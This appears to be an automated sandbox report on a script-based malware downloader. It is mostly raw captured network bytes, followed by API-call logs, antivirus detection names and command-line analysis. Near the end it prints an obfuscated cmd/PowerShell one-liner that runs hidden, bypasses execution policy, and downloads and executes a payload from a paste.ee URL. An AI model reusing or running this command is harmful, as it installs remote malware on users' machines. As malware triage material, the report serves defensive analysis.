R40v0*†HÎ=+"bóts§h‹`®C¸5Ł0{KIûÁaÎæÞF½kÕa5®@Ýs÷‰‘0Zë<î…|¢@v;©Æ¸GØ*璑jsé±r9Ÿ)Ÿ¢˜Ó_^X†e¡„eÑ܋ÉÇsȌj/åÄ«ÑŠ£ÿ0ü0Uÿ†0U%0++0Uÿ0ÿ0U€LÖëtÿI6£ÕØüµ>Åjð”Œ0U#0€`{fE —ʉP/}Í4¨ÿüýK06+*0(0&+0†http://i.pki.goog/gsr1.crt0-U&0$0"   †http://c.pki.goog/r/gsr1.crl0U  0 0g 0  *†H†÷  ‚B»Ö‡–ã?c ¤¡hH 9"sžøËN-1éŸç ¡Ò6„¬yëé°ëj¶{ }t¸›e«h*,,ÝBýÆq χ-÷kÈn}Vâ#XXù%º…G×– ý ¶Œà.®UÑyu5,1[?e¼Íœ‡B§‘±›^Žñ»Ê-Gð¬c~†¿ÖäkÓÖÓŽŠgX¸ÿ÷¦„ IP[?: % ò‹\ÓyW6‚Îÿ&·©ñ™í­‚>ÈnëÓ<8ÀAšá^SÏ> Wëîâ?H¥ñ¾Ñj# û?/¢µ½ên£FÎ.g¯3&˜ªÕKÒ©6Å&;[‹ˆÁå
Data received ’
Data received ŽAu©›Â'w¼Ö€PȶÁà~í)€ߣ`/l °¦Ü|©•áññàaXú§gˆW?‹â?PÌYð ,J¯®G0E!Õ¼j_\á£hwH5ŒvçÃ̤¸J,¹.3mÞ~õ >щFuÈ ©ÅÚÎþŽƒˆFKÁôº¦YUÀ^¬’"Ý
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received EðFø²‹-8—ÊŸ¨è˜Çºö¼O{Žî8A³NÁhì,,–céÔ›
Data received p
Data received k‰Ø$ŠNa½WšÓADÚւÂý†Žî@gsøpFæ†4C1jIéï7r SÁ¤_°ŽdW^Qì1¸†Š{^ʘmÚÂÃ*EIí8h¬®t.£|ûõÎë>U>èÙP#:Wq\Jw•9Lœˆ ‚¦ËF Œ*ŒA5çqþ`çi>RŸ¡Fú¶GåZw¯¯qð¦àæ՜ò%½Ðjø¾âl”AC{·)&Ž•¼r0‡×A-Êùçe¶®CÑöËH+•jÒ'˜š~h î”ÃØ°`ðr$ú­kø€baÍ\ôr¨/,svMõ õG+ô2EÙÕ7…{wÒþ«“ô€6ý›ñ(eB@c¹¿•Ô8ubeZF¬‘éšµŒꃙ~OÑã£gZ Íüì:FäðìUä2hJÀ5 _y{û{'_ýÙo¤}lÉ,Ž¡¯HŒ|®c±Ð6 f¼I è‰Wþú2qmÎîò;Ys¹ÂwY€Fæøµœº““¡lË©»@÷¢ðg•`ÏU8>iFؗ²–à³bà "mÔ÷4Ös,œS˜¶ûp‡HdÆ:G˜Ù6 † ŒzÞ÷'ð„Û´O€ôbògˆ¶kž/ù~)¢öž‹¹ÌéG`dt¾ð$y2×i:~¶Ë4"õÈs¥y1ºl‘äé<i*6†>•"n¬ŽíQÒãJ)‰N+—ͺ_gÜH£pd~h}¶Wôð¹p¯ÌÄ;ÒapåM?¤æØ.¤ÅÆ»¸>_mµ¿ë¶Y>uij/ÞHGh‡›HÃ"Ëj¶¢i¸ÁàñvúY)嘭ó°Ë– ’íAˆ†i³ŸQ¼ÜÄþGr’îs\ðSÍ8bFƒoû¸^iû³ÌZ-—ÿÈn Ô`3)ç×eÖK'YÙaÞB_Hï‹çæd¤_©ÎŒÏ9šlr ȧj«£^WQWM˜¸ þ¼.þä Wœ_8÷“S“sçóA€Š=¶{ü•óV`Ë/éÝaK{ Œ`°ÂAkøþFlUnâo:pY~«Ø@Û°4ºþÚrÿ0CWìësÀW}@ÏYùð<‹)WٔäÇ_ßc¬4ŒiR·é6£zÞAŒéDýYAmÉܜÉ¥ŽÞ¹?)âËò$üD5#"#™³:õ''€GÔ}ï°¸æ?sHlkRr²·\ÝÍ[Ž¬êܹóŽÙ"¤XöÀ']¢åè(X”¤e煐ÿ‘`㓌Srœb±l'¤'ëãш ‰gcÈ.AåNhI<·¤´+ÐQ*!2)’ì áÕåÎ}>ÕTãÕàÂu2kßÔ<š°´¥bäB§q€¢úu)Ð2?é(t‚M"'•Ø›Ä_šî§kã÷k7rýЛżÑ@¤åxC.°áõ¶¥º^ q̧é͹pR¼ó ”~Yù»9ŠÇÌqô»…?Uqá4œÃ¸„͵0+ݑ°Ê.bŒ_0ªŸ± ÕmE{‰ù•Ì»ƒI(áìÜGÈnÿ³eûDύ‹„à:¹$ʞõB)ì°èoÔ twjX]Ð}²ª2Á@iòXõ$ȐÒjÖrv-dû¼j^Á5Eý j…“ -Á¯ötÛ·8ÐÊ3Mɥ˪«\û#åO½"ÑÖÙíÍz?¬ ڕìA¹­„Pƒ0ìEõSàvàìtR’8µÐEåg> ᘷ¡r ‘ד½D0L9Ë"$~<*IŠí@>?Õ 2°ÂÇö`ŽV¿r6 ÿ <»ð›µšgåò‹¼G‰{Zì:‹Å×ÇM"貙»r×lv~2cÆ¿Ä
Data received ØõÛ+“·4„Còø•6!$+þg¼A$;eµ "jâõ$-XEq.¬ae(pg4ˆ‡Ya~LKGèŒùõ,Î.‹Ä’øÑÛ¨fÝo‹úæNßÜȉ&[ۇí±j½{¾AWeæ«Ój4Pc†7ím&¡ªøÖñ‰á9˜T£J[õ?ÓpXsË£ÂUXóÎO®@>º‡°bâ0'Ì.»gA£¢¥úäI ññ¨Yž5_ÖEëÈY1 _‹ùO·[ÉuÑáKÃ5®V{º…þ©ÙØ ñ·ǩ°q^ô?€+ìæ¿{;C¨rÙuŒ¯MÓÇא“SýÁ¶uóagˆÚ“‹zK>G 8Ž{¿•þ‘PEvßvtZ—§,`Á—Š€¡>P¥s‹/ÃpÝF,¨›ŽS ¦/ Ǐ0ϼ´**6ÌKÊ1†,Mön‘rD‚¥ØFÕ­a†°öuÝTܪÞQr¾M®pƒS×ìqTuª…[¢gÃÌVéˆR‡ÃDkmI ¿,¢]¤Lù©“ÞCDGëµ3D9.?›øJ¸÷ ™)åTæþ"ã_VJ‘üØÈ3Û·—ŘT#4šá$ŸúoZ°þzšqáAÉp H=|ª)P[= ëúÆLÜcü¯ ûô$J ô’P\PO•²Âi[fç÷w«ø0·yí?—½Ë‘ú±zMŽ…<ýD¿`UYWbétWfŠ³ˆÅë\déúVÙ8«ö6²Ò99s[3›±>%5Ç^¡`Ýg8”ƒ”¿‚· Á}5cà LÏÕÜlú&×ó ÃÈ&!eŠðºÄiˏa/*Þæ©iK6«J¦á÷Ïbé29UAc›ì(üÐ{È#g»ÑÅR½Ñ〞•tðRŸî²óöº‚5“·‰xð)÷¸Zr3Cõj͞*b#%öþHþµÁæNÖ°bÿ®G÷\±8ÇhG]^¥“Y&†°_§LøÈËHEâ#þ€R{ˆýÎoGÆbV®€¿”5¸ç"‡1ó¦—=z.§†í” ò+†×@›Þ/Å]Ãè„å«\nü¿w©cyC\C£K›Ô5¡2ò\/A…›“0¦lËèLI‹X˜KBûbö%üyM'šEZ¸pOòd l£E¸eXûÿ€–Oñ·©%Œó7Z? 8“{ýÂê2ª8’Sç qbŒägáΟ°)‘œ§Ã^K}ÂUv½a‹ÊÔ)Ó »æìÇÞ®_}4››Ò3ém¥ 6*æ¢:jù©ˆ|AEÈ Ì5rÄ8©–·.j ˆÃÙT•!”¯ï$yax'ä~k-uѳð, »“ôúžüã©FŠäÙÝ._in™—BbÓèo¼« ƃjë4#}wÂÚg#AÊlÌyÀ Ÿåðú]Xh!„ÎîÆÐÁ%kÿìÆ­žÍ)RfÏçÃ&Ã1¯=A#:ôõEɦk¨šœ(ø…]†›âþrYÌ×ûˆ¹ó=µ(QƒÙ bl¥&_DȦÀ™d²@5×F®T×ÃZj¿¨E€³NQMR‹^\ªšßé÷qí\ñ|wéÂÚì>ô=ËZÓJ˜ð¨”CyŸ½[J:›—4 ¹êEAsÆÝrÖEÊý †lß©‘×7Qû¤ó_t{Š8‚\)‹$|[7 í¾ óêì70¨ÉZpKžŠ±RùÛ÷©ŒFZ±’–y¯/Dcy¦°Ö)tæBc=ᝠlwÝUŒ ÓV[ðXÙäRïŠ~-© ItpøN¢šæ#sdÑ~ Ÿn¸ÁMv‹wƒ#Û\Ô©ì^Pdk-ÛúùÛ$}M¢ªm‚³Dûiª$gž~ñï”
Data received ÈMò$o¢V¤¹Ó¡@ÿ‹]æ‰ß$k×Ò±5ŒkµÌ”$Æ}ö:Uϓ³ j’—¢~nm8¯ÆdwÅ6Ü^¬’jeQ>pÅ%Óƀ’:Š:u]4^º³ý±ìCä¿bB;›ûs©mÉn±ýV;ŽË$n[Þ·ÔÕõØ:x”õěAAqÃO­Ú—>—à/Ñ8]ž@˜7ª´ÐcN’§ðDrUœìUIrÐ/};')è? D1n¹»P…ólÈ®h`‰d»ç_ð~öNdí¨Q¦Ï{ºÚñƒù€?I…éPAÁ×ÝA©E¼ 6¿Ës!¿Ñ½‘FÈï†ôµTðéYg›ßFuz´¤Ÿw”Á‚góÞ’WIÜ(*i/(½ÓÊõS]4ÅFa•– ÒúDoÊ~í<ĐW¸Aµ~QžÃûeø ý瓩Rz ‘ÆiÃTf^JB{Ôcª¸*&Á`jÉXsŽæ›ñsœoc¡ƒàŽZFψï‡Kf697‚pÇ,\éCœcÚ'ì+û‰WMÁ0GW#æ$o,8óZ¬‚½Ü%\ÍúAËòîãÁ` ÿ1 Ÿµ‰)‰< ê½êWW “k8kÎٙÝ9"t|•d Fâ~q#çð5Ä£MkÔ-[ ¡9½ÉÚÅ^Cœ—–^×X¡3Å-Nîsû_[Ce "Ì6oà“¤óýjÉq1êŒÊë0Èe"&NˆêæíV7Êf{礪+œ@añ¶iò7©¤OoM hϼ‘ßœƒ…DeÑ©›h. ™Aèؤ“ôH[Ä~ÇèÀSÐ2ÖzÛKvNq\˜4¶MóQOò´éT_°Oz.ä"¼˜¬ÅP÷°c‘ÙnR«žûø¢ÚÔüóžÊxF؟£\°o›˜r~$gÞ´º×]l6½¾n›Ò¨òQü"¢ñÝwnÙ6’©$M kŠÊµµ·¶¸"œ"1ìWlÿßPVýǃíL!EòWÔQÇè-4|ˆšßÙ4K€1)7õ§ “FZG&>½b¤rv*1sÍ)Ó.<)ñ´?í$d³qç[„ ?‰§ˆÄoÒj¾Ü«i†G< lUIÈé*á|üq oXfޟ¿<áY]õw +ÇK,jLŽt§Â1svRî­ÌD-o“£ñ×/"Y¤2ÎøìYºkĎUù §6ox3ŒÒî¸cŽ<¥LوÖõ¼©ª‹*RaÛx?uÌÓ氌3ApCV¥Œ Ï͊;¶Ò}ûe$ð=JE"û¥¡ÝȨêöò—)ēӕes(ÿžKÍ®xÚÈý ¿§FsÈ.š^zçBíÁkÂÅ÷öù2¢bÌj×ÁÿÝ´»äáu]Ú ÿÙ­Ãö¸«U¦¥}g»hGˆ’®†Nø£öcž½GÑ ±#­ Ñý/ ÜéȬïl}d‡:?Åo­H·8X_>ñ¯õxIÕ¢7&&N¢ù¦‰P 8g“ƒÌÍÝj4 LÃçIú¬Ð4Û6?² qY¿Y¨˜Rlù·:ôD§4±I¶¢'[3W§ pƒN]öîÍ$ÞJ~G²û«$Ëtñ`bOhéÇ7àØÒ¢2÷TÉl’„­=%÷› ö¨(v™È˜>9[ãZ”yn976@£Ø¹P*u„x!ɇZíÐQvÍ®9HÙuÛ`$X+_™u“TP‰Ùj c£–• ѪՅºˆâ0ЦB6mßJ`k¨°üÖ@>•.Ø2>2%¼>£MFçj~­g¶©{ÿm?mÑVÄyskÍ0”æ8„¬Åý£F‹?á+‡nÁ
Data received 
Data received õ׋٨f•-«Á9ޖpwÜJsëmOòºA×ВÉãVn çeò_kn†xÈ41ÅY‰å²çúx㟇å/ô¼È+‡mq2ÊkØñ ¯ÿOEz觌—:ü‡òaåj+§uýF>Ç ±*àËö9ê?Óó-Š(eRk8×{"ÿ´qf7ˆÑZûݎé‡âììsEz)PÆ-‘¡¹oã_µ,&┐´´2{kçÑ:ꚑª.ÒxÅ#Ô[¨&ýܾÒú9 _vJt2Á*ˆeï'²yCäíõTŽàuúڒ–Í zï’?VÍtÎжä­õ¹í™¤S¤TȔ¿qÐz}ê$¸$…¨t`ëX%Šü5‹¡æ¸¢K¢Än ´VJ?¦Óßfõ«káӇیÜ< ÇÑJ[®=Ö¹âˆE°×ñ¹‘֏n–Çà<¢¤‚¢&?Ñà W @ÏçèS;Q×T€n,kŠ«}”¤²Pâ‡+ûXíw›GE¹ú°ŠD“iÜ{üôěX@À˜bx6ãtóU¯;fÇWM}H]¾^W”RLß ¹˜Þ%8¥gAy¾h>U=y®­í̗ÚÁn÷Ðüer†Íάøcÿ…Sø.«¹ ™æÖ¼jh ‡°<„\/ØØ=³þìô÷^º2º¾Øb*Ø£õØZƒq½Ã"fúþÇò¨½{=€’çT«áü‘Oåâ¼Ô<{'ÔRIÁ«{ïî‹ñüÌOOfŽºâɒ揲–7·—€w4R馟«wôXÃANä&œS ¦7½É ½ð_ФlXŠUHE€Šà’Ÿê¨-8¿Ò7 5Z:`Þ¸DNZ6σœpƸþJ€þ&ê ©jbztÃ#e½Zmm{,¦»ì`!¬Ÿ•ýÎ,“|;Ç ÄŸóö±‘*o¥#¿R^{9¿‘5ûéþ̜†—Ñ㎢¼0À²ïïiARŒ/ö²~¦ûLwà!…€ÅœÄíʃw=ߌ֘Š˜'¢È~y—)¤’!¤L¤ ™ñ™mRn ò›ŽjÅâµUö~wmóõ†@áüØü¿@ۆ<ݺ$áÇ]ü»'¥, ¸ öFb ïçQ].Ë> ¡á¡[³eÃ>ʛºÝ2fVY¹vF®hT:N•ß U³,ãcZڎ0æßK"ŠçpP §
Data received 
Data received Krç¹Õ»Z2ãzçëÄ0éñ Wòʁ^wé‰
Data sent kgf§LÒo#ú&„Öä·Gäh®íÉ»¨ß 9¿‡¶U/5 ÀÀÀ À 28&ÿ paste.ee  
Data sent FBA**‚Ìæßî™âO¦µz.!­Q—ÙRØ]ˆD!ÏͺÐ}+à…6ă¥lA/ãY¦‹}sÍ~ÆðL²PïoŒ0ÀPÀ~Fn/âìDŸE/7˜ G¡•:7ú”úçŸC¸9{7ã3_‹ƒé™”Wî
Data sent `ÅCöôTcwW'6Ó¦™HäußPå«©¬ÓGkbË~ ”¿ëÌCÅ8ò%Œÿˆ?ô”´Ðb%>ClRTRt哫Væa_ѳ%/?š¾åçRñûnÁvN×ÌzìàQ®ÃB÷ñp
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Symantec ISB.Downloader!gen80
ESET-NOD32 PowerShell/Runner.A suspicious
Avast Script:SNH-gen [PUP]
Kaspersky HEUR:Trojan.VBS.Alien.gen
Rising PUF.Runner/PS!8.188C4 (TOPIS:E0:V57SxEang5G)
Ikarus Trojan.PowerShell.Agent
Google Detected
Microsoft Trojan:VBS/Obfuse.RTDF!MTB
ZoneAlarm HEUR:Trojan.VBS.Alien.gen
Varist VBS/Agent.BOL!Eldorado
huorong TrojanDownloader/PS.NetLoader.fk
AVG Script:SNH-gen [PUP]
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

buffer: kgf§LÒo#ú&„Öä·Gäh®íÉ»¨ß 9¿‡¶U/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 1424
sent: 112
1 112 0

send

buffer: FBA**‚Ìæßî™âO¦µz.!­Q—ÙRØ]ˆD!ÏͺÐ}+à…6ă¥lA/ãY¦‹}sÍ~ÆðL²PïoŒ0ÀPÀ~Fn/âìDŸE/7˜ G¡•:7ú”úçŸC¸9{7ã3_‹ƒé™”Wî
socket: 1424
sent: 134
1 134 0

send

buffer: `ÅCöôTcwW'6Ó¦™HäußPå«©¬ÓGkbË~ ”¿ëÌCÅ8ò%Œÿˆ?ô”´Ðb%>ClRTRt哫Væa_ѳ%/?š¾åçRñûnÁvN×ÌzìàQ®ÃB÷ñp
socket: 1424
sent: 101
1 101 0
parent_process wscript.exe martian_process Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
option -exec bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -wind hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
option -exec bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -wind hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
option -exec bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -wind hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
file C:\Windows\System32\cmd.exe